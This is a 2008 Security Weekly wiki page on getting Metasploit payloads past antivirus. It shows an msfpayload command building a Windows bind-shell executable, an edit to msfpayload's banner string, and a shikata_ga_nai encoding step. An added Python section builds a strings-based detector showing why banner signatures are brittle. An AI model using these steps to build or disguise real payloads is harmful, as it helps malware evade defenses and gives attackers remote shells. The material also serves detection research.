Difference between revisions of "Episode125"

From Security Weekly Wiki

Revision as of 18:08, 29 September 2008

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

Pass #1 - Metasploit Payload - Unmodified

msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

bash-3.2# strings payload.exe
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.bss
.idata
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LPORT=6453

Pass #2 - Metasploit Payload - Changed Version String

 
# Edited fragment of the msfpayload script (Ruby): this branch runs for the
# "X" output format and builds the note that gets embedded in the executable,
# which is what `strings` showed in Pass #1. Only the first line of the note
# is changed; the rest of the branch is unchanged and is not shown here.
if (cmd =~ /^x/)
        note =
                "PaulDotCom's Evil Payload\n" +   # was "Created by msfpayload (http://www.metasploit.com).\n"
                "Payload: " + payload.refname + "\n" +
                " Length: " + buf.length.to_s + "\n" +
                "Options: " + options + "\n"
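The point of Pass #1 and Pass #2 is that a signature keyed on the vendor banner is brittle: change one string in msfpayload and the match is gone, while the rest of the note (Payload / Length / Options) is still sitting in the binary. The following is an added example, not code from the Security Weekly page or from Metasploit: a small `strings`-style extractor plus two signatures run over constructed stand-ins for the Pass #1 and Pass #2 binaries. The sample bytes, the function names, and the `NOTE_LAYOUT_RE` pattern are all my own assumptions; the sample is not a real PE file, it only reproduces the printable strings the page shows.

```python
import re

# Minimum run of printable characters, the same default the `strings` tool uses.
MIN_LEN = 4


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> list[str]:
    """Pull printable-ASCII runs out of a binary, the way `strings` does."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Signature 1 (brittle): the vendor banner msfpayload writes into every
# executable it builds.  This is the string Pass #2 edits away.
BANNER_RE = re.compile(r"Created by msfpayload \(http://www\.metasploit\.com\)\.")

# Signature 2 (sturdier): the layout of the note that follows the banner,
# regardless of what the banner says.  Assumed pattern, written for this example.
NOTE_LAYOUT_RE = re.compile(r"Payload: [a-z0-9_]+/\S+\s+Length: \d+\s+Options: \S+")


def banner_match(data: bytes) -> bool:
    """True if the unmodified msfpayload banner is present."""
    return any(BANNER_RE.search(s) for s in extract_strings(data))


def note_layout_match(data: bytes) -> bool:
    """True if the Payload/Length/Options note layout is present.

    The note spans several lines, so the extracted strings are re-joined
    with newlines before matching.
    """
    return NOTE_LAYOUT_RE.search("\n".join(extract_strings(data))) is not None


def scan(data: bytes) -> dict[str, bool]:
    """Run both signatures and report which ones fired."""
    return {"banner": banner_match(data), "note_layout": note_layout_match(data)}


def build_sample(note: str) -> bytes:
    """Constructed stand-in for an msfpayload-built PE: DOS-stub text, section
    names and a little non-printable filler, then the note.  Not a real
    executable; it only reproduces the strings shown on the page."""
    return (
        b"MZ\x90\x00\x03\x00"
        + b"!This program cannot be run in DOS mode.\r\n"
        + b"\x00" * 16
        + b".text\x00\x00\x00.rdata\x00\x00@.data\x00\x00.bss\x00\x00.idata\x00"
        + b"\x01\x02\x03"
        + note.encode("ascii")
        + b"\x00" * 8
    )


# Constructed notes: Pass #1 as `strings` showed it, Pass #2 with the banner edited.
PASS1_NOTE = (
    "Created by msfpayload (http://www.metasploit.com).\n"
    "Payload: windows/shell_bind_tcp\n"
    " Length: 317\n"
    "Options: LPORT=6453\n"
)
PASS2_NOTE = PASS1_NOTE.replace(
    "Created by msfpayload (http://www.metasploit.com).", "PaulDotCom's Evil Payload"
)

PASS1 = build_sample(PASS1_NOTE)
PASS2 = build_sample(PASS2_NOTE)

if __name__ == "__main__":
    for name, sample in (("pass1", PASS1), ("pass2", PASS2)):
        print(name, scan(sample))
    # pass1 {'banner': True, 'note_layout': True}
    # pass2 {'banner': False, 'note_layout': True}
```

Running it shows the banner signature firing only on the Pass #1 sample, while the layout signature fires on both. The lesson for the detection side is to key signatures on what the tool has to leave behind (structure, behaviour) rather than on a cosmetic string the tool's author put there.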

Pass #3 - Metasploit Payload Encoded With Shikata Ga Nai

msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe